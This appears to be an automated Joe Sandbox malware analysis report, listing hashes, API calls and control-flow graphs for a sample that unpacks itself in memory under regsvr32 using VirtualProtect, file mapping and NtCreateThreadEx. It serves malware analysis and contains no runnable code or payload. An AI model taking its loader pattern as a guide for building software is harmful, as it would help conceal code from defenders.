                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_40b000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFree$AbortCriticalEnvironmentEqualEventFrequencyHeapIndicatorLeaveMessageNamedObjectPerformancePipeQueryReadSectionShutdownStringsSystemWaiting
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1499581954-0
                                                                                                                                                                      • Opcode ID: 554733c9555090acae26fb75125752e492cde8f7e525f2d39a28a07975cfd069
                                                                                                                                                                      • Instruction ID: 7bb71a299ec9fd597a22554f06b932c273aa18c07b422c39bf0ba1d0a5452d15
                                                                                                                                                                      • Opcode Fuzzy Hash: 554733c9555090acae26fb75125752e492cde8f7e525f2d39a28a07975cfd069
                                                                                                                                                                      • Instruction Fuzzy Hash: DC110072602424BBCB21AB65ED48DDF7B7CEF4A355B41406AF20992111CE345A4ACFAD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • __copytlocinfo_nolock.LIBCMT ref: 0040F0DA
                                                                                                                                                                      • __setlocale_nolock.LIBCMT ref: 0040F0EF
                                                                                                                                                                      • ___removelocaleref.LIBCMT ref: 0040F13C
                                                                                                                                                                      • _sync_legacy_variables_lk.LIBCMT ref: 0040F175
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983934615.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_40b000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ___removelocaleref__copytlocinfo_nolock__setlocale_nolock_sync_legacy_variables_lk
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 219049737-0
                                                                                                                                                                      • Opcode ID: dacc1972c0434a0bf5af0a5a41b4905e0ab1bd420b2feee1509a2fb71b3498ae
                                                                                                                                                                      • Instruction ID: e82b908fcd04b0c8271428fc9e876450d87c6f8e9b7736501bad91097e15c42b
                                                                                                                                                                      • Opcode Fuzzy Hash: dacc1972c0434a0bf5af0a5a41b4905e0ab1bd420b2feee1509a2fb71b3498ae
                                                                                                                                                                      • Instruction Fuzzy Hash: BB319E71A04304EADB20BFA6D88275D77A0AF44318F64847FF8057A2D2DBBC8949965D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983934615.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_40b000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ___freetlocinfo___removelocaleref$__copytlocinfo_nolock__setlocale_nolock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2861315002-0
                                                                                                                                                                      • Opcode ID: 676938aa1b07ffee4317a3e9da7522dc6a978b0ffa9d9d955223042bd2505dcb
                                                                                                                                                                      • Instruction ID: 1e9a1880e5c348e0703ca33c00f51b07e8167d824e2e2b5aeb5d90bb728b835f
                                                                                                                                                                      • Opcode Fuzzy Hash: 676938aa1b07ffee4317a3e9da7522dc6a978b0ffa9d9d955223042bd2505dcb
                                                                                                                                                                      • Instruction Fuzzy Hash: 0C21D635508602AED7357F27D80291A7BE4DF9176CB20883FF884762E2EE7DA810865D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00426B1C
                                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00426B43
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00426B4A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983934615.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_40b000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EnvironmentFreeHandleModuleStringStrings
                                                                                                                                                                      • String ID: -$-
                                                                                                                                                                      • API String ID: 1582636504-2078519666
                                                                                                                                                                      • Opcode ID: 8f32ab569507f01aa0049d6880b6fb86c3b21e050f5aecc8115885299aab47e4
                                                                                                                                                                      • Instruction ID: a5cf57eb544cada761a9054dbdeb56e39503428340a04bc9be4330430455ef5c
                                                                                                                                                                      • Opcode Fuzzy Hash: 8f32ab569507f01aa0049d6880b6fb86c3b21e050f5aecc8115885299aab47e4
                                                                                                                                                                      • Instruction Fuzzy Hash: 9401F930600124ABC7709F29ECC4D5F7FF8EB89314B92406EE451D7160CE34598ACB99
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:28.1%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:58
                                                                                                                                                                      Total number of Limit Nodes:12
                                                                                                                                                                      execution_graph 1647 4b31aa2 VirtualProtect 1648 4b31b8f 1647->1648 1649 4b311f5 1650 4b3120a 1649->1650 1655 4b3109f VirtualAlloc 1650->1655 1652 4b3122d 1657 4b3199e VirtualProtect 1652->1657 1654 4b31254 1656 4b3112e 1655->1656 1656->1652 1658 4b31a1e 1657->1658 1659 4b31a57 VirtualProtect 1658->1659 1660 4b31a9d 1659->1660 1660->1654 1661 4c81000 1664 4c8104f 1661->1664 1662 4c810d9 1663 4c8150a VirtualAlloc 1663->1664 1664->1662 1664->1663 1665 4c81386 VirtualProtect 1664->1665 1666 4c81426 VirtualProtect VirtualProtect 1664->1666 1668 4dc90d0 1664->1668 1665->1664 1665->1666 1666->1664 1670 4dc9116 1668->1670 1669 4dc95c0 1669->1664 1670->1669 1672 4dc2280 1670->1672 1674 4dc22dd 1672->1674 1673 4dc4733 1673->1670 1674->1673 1678 4dc4a20 1674->1678 1687 4dc89b0 1674->1687 1691 4dc47b0 1674->1691 1680 4dc4a7c 1678->1680 1679 4dc7f14 1679->1674 1680->1679 1695 4dc1c80 1680->1695 1699 4dc16e9 CreateFileMappingW 1680->1699 1702 4dc8710 1680->1702 1706 4dc86f0 1680->1706 1710 4dc870f 1680->1710 1714 4dc1fc0 1680->1714 1688 4dc8a34 1687->1688 1689 4dc8abc VirtualAlloc 1688->1689 1690 4dc8b1d 1688->1690 1689->1688 1690->1674 1693 4dc482a 1691->1693 1692 4dc494c 1692->1674 1693->1692 1694 4dc48c2 VirtualFree 1693->1694 1694->1693 1696 4dc1d42 1695->1696 1696->1696 1697 4dc1e70 1696->1697 1698 4dc1dea NtCreateThreadEx 1696->1698 1697->1680 1698->1696 1700 4dc16ab 1699->1700 1700->1699 1701 4dc1779 1700->1701 1701->1680 1704 4dc879b 1702->1704 1703 4dc8810 MapViewOfFile 1703->1704 1704->1703 1705 4dc887b 1704->1705 1705->1680 1708 4dc870a 1706->1708 1707 4dc8810 MapViewOfFile 1707->1708 1708->1707 1709 4dc887b 1708->1709 1709->1680 1712 4dc8712 1710->1712 1711 4dc8810 MapViewOfFile 1711->1712 1712->1711 1713 4dc887b 1712->1713 1713->1680 1716 4dc2040 1714->1716 1715 4dc20c6 FindCloseChangeNotification 1715->1716 1716->1715 1717 4dc211d 1716->1717 1717->1680

                                                                                                                                                                      Callgraph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                                      • Disassembly available
                                                                                                                                                                      callgraph 0 Function_04B324B4 1 Function_04B320BB 2 Function_04DC90D0 24 Function_04DC2280 2->24 3 Function_04C817C4 52 Function_04C85260 3->52 55 Function_04C85878 3->55 83 Function_04C81610 3->83 4 Function_04C825C4 5 Function_04B31AA2 65 Function_04B3260F 5->65 6 Function_04DC18C4 7 Function_04DC1FC0 7->6 8 Function_04DC18C0 9 Function_04B318AC 70 Function_04B31D7A 9->70 10 Function_04B31290 10->9 11 Function_04C82BEF 12 Function_04C82BE2 13 Function_04DC86F0 14 Function_04B3109F 23 Function_04B321E9 14->23 48 Function_04B32512 14->48 14->65 15 Function_04B3199E 15->65 86 Function_04B3206D 15->86 16 Function_04C830F8 17 Function_04DC16E9 18 Function_04DC18E0 19 Function_04B311F5 19->0 19->14 19->15 81 Function_04B32660 19->81 92 Function_04B32741 19->92 20 Function_04B324FC 21 Function_04B321E2 22 Function_04B315EA 22->81 29 Function_04DC47B0 24->29 30 Function_04DC89B0 24->30 37 Function_04DC1554 24->37 77 Function_04DC100C 24->77 94 Function_04DC4A20 24->94 25 Function_04DC1C80 26 Function_04DC8C80 27 Function_04B330EE 28 Function_04B322D9 39 Function_04DC7F50 30->39 31 Function_04B326DE 32 Function_04B315CB 33 Function_04B340CB 34 Function_04B320C9 35 Function_04B32133 36 Function_04B31F37 38 Function_04B31039 40 Function_04DC1550 41 Function_04DC7F44 42 Function_04C85250 43 Function_04C83250 44 Function_04DC1F40 45 Function_04DC7F40 46 Function_04B31D2D 47 Function_04C85068 48->86 49 Function_04C8446C 49->47 91 Function_04C83138 49->91 50 Function_04C8586C 51 Function_04B32115 53 Function_04DC1370 54 Function_04B3221C 56 Function_04B32503 57 Function_04B31D03 58 Function_04B31000 59 Function_04B34007 60 Function_04B31506 60->9 61 Function_04B31405 61->9 62 Function_04B34005 63 Function_04C83270 63->3 63->42 63->63 76 Function_04C82C04 63->76 78 Function_04C82C18 63->78 82 Function_04C8311F 63->82 64 Function_04DC7F60 66 Function_04B31D0E 67 Function_04C82708 68 Function_04B33077 69 Function_04C81000 69->2 69->4 69->49 69->63 69->67 71 Function_04B32479 71->9 72 Function_04B32178 72->65 73 Function_04DC8710 74 Function_04DC9B10 75 Function_04DC1C10 79 Function_04B32063 80 Function_04DC870F 84 Function_04DC1000 85 Function_04B3416F 87 Function_04C83117 88 Function_04B31D5A 89 Function_04DC7F30 90 Function_04B3185E 91->47 93 Function_04C8503C 94->7 94->13 94->17 94->25 94->41 94->73 94->80 94->89 95 Function_04DC8220 96 Function_04DC1020

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 91 4c81000-4c8104d 92 4c8104f-4c81085 91->92 92->92 93 4c81087-4c8109e 92->93 94 4c810a5-4c810a7 93->94 95 4c810a9-4c810b5 call 4dc90d0 94->95 96 4c810c1-4c810cb 94->96 99 4c810b8-4c810bc 95->99 97 4c810d9-4c810e7 96->97 98 4c810cd-4c810d7 96->98 98->97 100 4c810ea-4c810f4 98->100 101 4c815f1 99->101 102 4c810fa-4c81104 100->102 103 4c81602-4c8160a 100->103 106 4c815f3-4c815fd 101->106 104 4c8110a-4c81262 call 4c825c4 102->104 105 4c81267-4c81270 102->105 103->94 104->94 108 4c814bc-4c814c6 105->108 109 4c81276-4c813f7 call 4c83270 * 4 call 4c82708 VirtualProtect 105->109 106->94 108->94 111 4c814cc-4c814d5 108->111 132 4c813f9 109->132 133 4c81426-4c814b7 VirtualProtect * 2 109->133 113 4c814d7-4c814df 111->113 113->113 115 4c814e1-4c81580 call 4c83270 VirtualAlloc call 4c8446c 113->115 123 4c81585-4c815ed call 4c8446c * 3 115->123 123->101 134 4c813fb-4c81424 132->134 133->106 134->133 134->134
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualProtect.KERNEL32(?,?,00000001,?,-00000001,-00000001,?,?,795F5BE9,?,00000001,00000000,9590D1A0,1DF7061D,?,00000000), ref: 04C813C1
                                                                                                                                                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 04C81452
                                                                                                                                                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 04C81495
                                                                                                                                                                      • VirtualAlloc.KERNEL32(?,?,?,?,D6CB7F5B,B19E9A75,?,00000001,000000FF), ref: 04C81555
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1981296431.0000000004C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 04C81000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_4c81000_regsvr32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Virtual$Protect$Alloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2541858876-0
                                                                                                                                                                      • Opcode ID: a13c56620484702d4540ff6d1e7d0985b5cfdc8d2662caac51adeda587301f79
                                                                                                                                                                      • Instruction ID: 473946ce01268717c307737b20a1b762cee4fc0b5323483e9cbb2a217814d617
                                                                                                                                                                      • Opcode Fuzzy Hash: a13c56620484702d4540ff6d1e7d0985b5cfdc8d2662caac51adeda587301f79
                                                                                                                                                                      • Instruction Fuzzy Hash: B3F1E4766043108FD718CF29C88466BB7E7BFC8714F1AC66DE8899B354DA34EC068B91
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 203 4dc1fc0-4dc203b 204 4dc2040-4dc2066 203->204 204->204 205 4dc2068-4dc20ab 204->205 206 4dc20af-4dc20b1 205->206 207 4dc20bc-4dc20c4 206->207 208 4dc20b3-4dc20ba 206->208 209 4dc2105-4dc210f 207->209 210 4dc20c6-4dc2103 FindCloseChangeNotification 207->210 208->206 211 4dc2181-4dc2272 call 4dc18c4 209->211 212 4dc2111-4dc211b 209->212 210->206 211->206 214 4dc211d-4dc212d 212->214 215 4dc2130-4dc213a 212->215 216 4dc213c-4dc2146 215->216 217 4dc2168-4dc217c 215->217 216->206 219 4dc214c-4dc2163 216->219 217->206 219->206
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindCloseChangeNotification.KERNEL32(?), ref: 04DC20E4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1981408251.0000000004DC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04DC1000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_4dc1000_regsvr32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                                                      • Opcode ID: 55fb1617748b7de478714b5e312ec9766066b521c01e928219f7778c7c2684d2
                                                                                                                                                                      • Instruction ID: 25a86a2f3f2e1260f94260a45b958795e93f5c7a136fd1c583516506665d6802
                                                                                                                                                                      • Opcode Fuzzy Hash: 55fb1617748b7de478714b5e312ec9766066b521c01e928219f7778c7c2684d2
                                                                                                                                                                      • Instruction Fuzzy Hash: 63814B76A087118FC314CF29C88055BB7E2FFC8310F568A6EE5959B358D734B906CB92
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 222 4dc8710-4dc8796 223 4dc879b-4dc87bb 222->223 223->223 224 4dc87bd-4dc8808 223->224 225 4dc880c-4dc880e 224->225 226 4dc8847-4dc8851 225->226 227 4dc8810-4dc8845 MapViewOfFile 225->227 228 4dc88c6-4dc88de 226->228 229 4dc8853-4dc885d 226->229 227->225 228->225 230 4dc88e3-4dc89a4 229->230 231 4dc8863-4dc886d 229->231 230->225 232 4dc886f-4dc8879 231->232 233 4dc88b9-4dc88c1 231->233 234 4dc888c-4dc8896 232->234 235 4dc887b-4dc888b 232->235 233->225 234->225 237 4dc889c-4dc88b4 234->237 237->225
                                                                                                                                                                      APIs
                                                                                                                                                                      • MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 04DC882F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1981408251.0000000004DC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04DC1000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_4dc1000_regsvr32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileView
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3314676101-0
                                                                                                                                                                      • Opcode ID: 3132ba2a2f8e37d1846628c23b9c9f8803c3a876f31a6b3a4dcfc79bb3822745
                                                                                                                                                                      • Instruction ID: 520ff740cf39730626c250253d8c3dcd0c14f2f583e62c53548d2f40edd6b54c
                                                                                                                                                                      • Opcode Fuzzy Hash: 3132ba2a2f8e37d1846628c23b9c9f8803c3a876f31a6b3a4dcfc79bb3822745
                                                                                                                                                                      • Instruction Fuzzy Hash: 0F71A172A087618FC714CF29D88055BB7E2BFC8350F56892DF995A7364D634EC06CB82
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 239 4dc1c80-4dc1d3d 240 4dc1d42-4dc1d66 239->240 240->240 241 4dc1d68-4dc1d95 240->241 242 4dc1d99-4dc1da3 241->242 243 4dc1db9-4dc1dc3 242->243 244 4dc1da5-4dc1db4 242->244 246 4dc1dc9-4dc1dd3 243->246 247 4dc1e81-4dc1f35 243->247 245 4dc1e60-4dc1e6a 244->245 245->242 250 4dc1e70-4dc1e7e 245->250 248 4dc1dde-4dc1de8 246->248 249 4dc1dd5-4dc1dd9 246->249 247->245 251 4dc1dea-4dc1e40 NtCreateThreadEx 248->251 252 4dc1e42-4dc1e4c 248->252 249->245 251->245 252->245 254 4dc1e4e-4dc1e5e 252->254 254->245
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtCreateThreadEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 04DC1E38
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1981408251.0000000004DC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04DC1000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_4dc1000_regsvr32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: dbbcdfcf5644a128e09e35280916ceeeb35af4c6c3b6af49eff7b69e2a579ab3
                                                                                                                                                                      • Instruction ID: cb7903ce972fd59f6e1458d2c45c4bd457c2150525bdda2638c0b138f1809a8c
                                                                                                                                                                      • Opcode Fuzzy Hash: dbbcdfcf5644a128e09e35280916ceeeb35af4c6c3b6af49eff7b69e2a579ab3
                                                                                                                                                                      • Instruction Fuzzy Hash: 3C716B766087018FC715CF69C890A5BBBE3FFC9350F598A1DE59587368DA34E805CB82
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 256 4dc16e9-4dc173a CreateFileMappingW 257 4dc173d-4dc176a 256->257 258 4dc16ab-4dc16ae 257->258 259 4dc16b4-4dc16bc 258->259 260 4dc17c2-4dc17da 258->260 261 4dc17a6-4dc17bd 259->261 262 4dc16c2-4dc16ce 259->262 260->258 261->258 263 4dc179b-4dc17a1 262->263 264 4dc16d4-4dc16e3 262->264 263->258 264->256 265 4dc176f-4dc1777 264->265 266 4dc1779-4dc1788 265->266 267 4dc178b-4dc1793 265->267 267->258 268 4dc1799-4dc18af 267->268 268->257
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileMappingW.KERNELBASE(?,?,?,?,?,?), ref: 04DC1726
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1981408251.0000000004DC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04DC1000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_4dc1000_regsvr32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFileMapping
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 524692379-0
                                                                                                                                                                      • Opcode ID: d96344702246819a489ec6ad4fdc5d5660be76fec898eb51eca553cbdf48f69b
                                                                                                                                                                      • Instruction ID: 07ae28002f019a9521c213e693500b7f71b55fee6f98263690700eae42aba526
                                                                                                                                                                      • Opcode Fuzzy Hash: d96344702246819a489ec6ad4fdc5d5660be76fec898eb51eca553cbdf48f69b
                                                                                                                                                                      • Instruction Fuzzy Hash: 46511876E10119CBCF14CFA9C991AADF7B2FF88314F258199C456AB255DB30AD86CF40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 272 4dc86f0-4dc8708 273 4dc872e-4dc8796 272->273 274 4dc870a-4dc870c 272->274 275 4dc879b-4dc87bb 273->275 274->273 275->275 276 4dc87bd-4dc8808 275->276 277 4dc880c-4dc880e 276->277 278 4dc8847-4dc8851 277->278 279 4dc8810-4dc8845 MapViewOfFile 277->279 280 4dc88c6-4dc88de 278->280 281 4dc8853-4dc885d 278->281 279->277 280->277 282 4dc88e3-4dc89a4 281->282 283 4dc8863-4dc886d 281->283 282->277 284 4dc886f-4dc8879 283->284 285 4dc88b9-4dc88c1 283->285 286 4dc888c-4dc8896 284->286 287 4dc887b-4dc888b 284->287 285->277 286->277 289 4dc889c-4dc88b4 286->289 289->277
                                                                                                                                                                      APIs
                                                                                                                                                                      • MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 04DC882F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1981408251.0000000004DC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04DC1000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_4dc1000_regsvr32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileView
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3314676101-0
                                                                                                                                                                      • Opcode ID: 97f5980f527d70e8d65a3e144054e54a0e2a2daba335eed7fcbf78a1b69837d6
                                                                                                                                                                      • Instruction ID: 2916db35159a50183e11842d3ff7cf8896b7de7dc9169c8f3cac355f2bc1ad90
                                                                                                                                                                      • Opcode Fuzzy Hash: 97f5980f527d70e8d65a3e144054e54a0e2a2daba335eed7fcbf78a1b69837d6
                                                                                                                                                                      • Instruction Fuzzy Hash: BD31E572E087618FC711CF69C88065BBBE2AFC8750F56896DF9849B765D634C806CB82
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 291 4dc870f-4dc8796 293 4dc879b-4dc87bb 291->293 293->293 294 4dc87bd-4dc8808 293->294 295 4dc880c-4dc880e 294->295 296 4dc8847-4dc8851 295->296 297 4dc8810-4dc8845 MapViewOfFile 295->297 298 4dc88c6-4dc88de 296->298 299 4dc8853-4dc885d 296->299 297->295 298->295 300 4dc88e3-4dc89a4 299->300 301 4dc8863-4dc886d 299->301 300->295 302 4dc886f-4dc8879 301->302 303 4dc88b9-4dc88c1 301->303 304 4dc888c-4dc8896 302->304 305 4dc887b-4dc888b 302->305 303->295 304->295 307 4dc889c-4dc88b4 304->307 307->295
                                                                                                                                                                      APIs
                                                                                                                                                                      • MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 04DC882F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1981408251.0000000004DC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04DC1000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_4dc1000_regsvr32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileView
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3314676101-0
                                                                                                                                                                      • Opcode ID: fad0a7eae3943d6ab2ea7eece2d7452a9bfb4b303731b4cca0cac27bfb59c7c2
                                                                                                                                                                      • Instruction ID: 1d130977ab53bb470b9d513da46feb6c7193268c9c3726a69a48139c2940d2f6
                                                                                                                                                                      • Opcode Fuzzy Hash: fad0a7eae3943d6ab2ea7eece2d7452a9bfb4b303731b4cca0cac27bfb59c7c2
                                                                                                                                                                      • Instruction Fuzzy Hash: 7E31AF72A087618FC710CF69C880A5BBBF2BFD8750F56892DF99597364DA34D806CB81
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 316 4dc89b0-4dc8a32 317 4dc8a79-4dc8aa5 316->317 318 4dc8a34-4dc8a38 316->318 320 4dc8aa8-4dc8aaa 317->320 318->317 319 4dc8a3a-4dc8a3c 318->319 321 4dc8a3e-4dc8a77 319->321 322 4dc8b7f-4dc8b99 320->322 323 4dc8ab0-4dc8aba 320->323 321->317 321->321 326 4dc8b9b-4dc8bb2 322->326 324 4dc8abc-4dc8af7 VirtualAlloc 323->324 325 4dc8af9-4dc8b03 323->325 324->320 327 4dc8b05-4dc8b0f 325->327 328 4dc8b73-4dc8b7a 325->328 326->326 329 4dc8bb4-4dc8c77 call 4dc7f50 326->329 330 4dc8b5c-4dc8b6e 327->330 331 4dc8b11-4dc8b1b 327->331 328->320 329->320 330->320 332 4dc8b1d-4dc8b2d 331->332 333 4dc8b30-4dc8b3a 331->333 333->320 335 4dc8b40-4dc8b57 333->335 335->320
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAlloc.KERNEL32(?,?,?,?), ref: 04DC8AE2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1981408251.0000000004DC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04DC1000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_4dc1000_regsvr32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: 142edb86e710ab6bf6f4992881c25862ba229be0c251af75a9e29eac28416cb6
                                                                                                                                                                      • Instruction ID: 37f9930f482c447cd33cacbc8837ab9f55e336ff7225ef9db3d00335ec8ee311
                                                                                                                                                                      • Opcode Fuzzy Hash: 142edb86e710ab6bf6f4992881c25862ba229be0c251af75a9e29eac28416cb6
                                                                                                                                                                      • Instruction Fuzzy Hash: EC819073A187218FC714DF29C88055AB7E2BFC8310F5A4A2DE9959B754DA31FC02CB81
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 339 4dc47b0-4dc4828 340 4dc482a-4dc4865 339->340 341 4dc4867-4dc487e 339->341 340->340 340->341 342 4dc494c-4dc495c 341->342 343 4dc4884-4dc4890 341->343 344 4dc4896-4dc48a0 343->344 345 4dc492c-4dc493c 344->345 346 4dc48a6-4dc48b0 344->346 347 4dc4940-4dc4942 345->347 348 4dc495f-4dc4a14 346->348 349 4dc48b6-4dc48c0 346->349 350 4dc4944-4dc4946 347->350 348->350 351 4dc48fa-4dc4904 349->351 352 4dc48c2-4dc48f8 VirtualFree 349->352 350->342 350->344 354 4dc4918-4dc492a 351->354 355 4dc4906-4dc4910 351->355 352->350 354->347 355->350 356 4dc4912-4dc4916 355->356 356->347
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualFree.KERNELBASE(?,?,?), ref: 04DC48E2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1981408251.0000000004DC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04DC1000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_4dc1000_regsvr32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                                                      • Opcode ID: f07a60ad43d9737788690ae6dadda596156cc3814e82962e9b714f73f23f133c
                                                                                                                                                                      • Instruction ID: abdb9e1d39e2b20acb5d404739a68b46e52b09f01796e331f9c9835867dd1e72
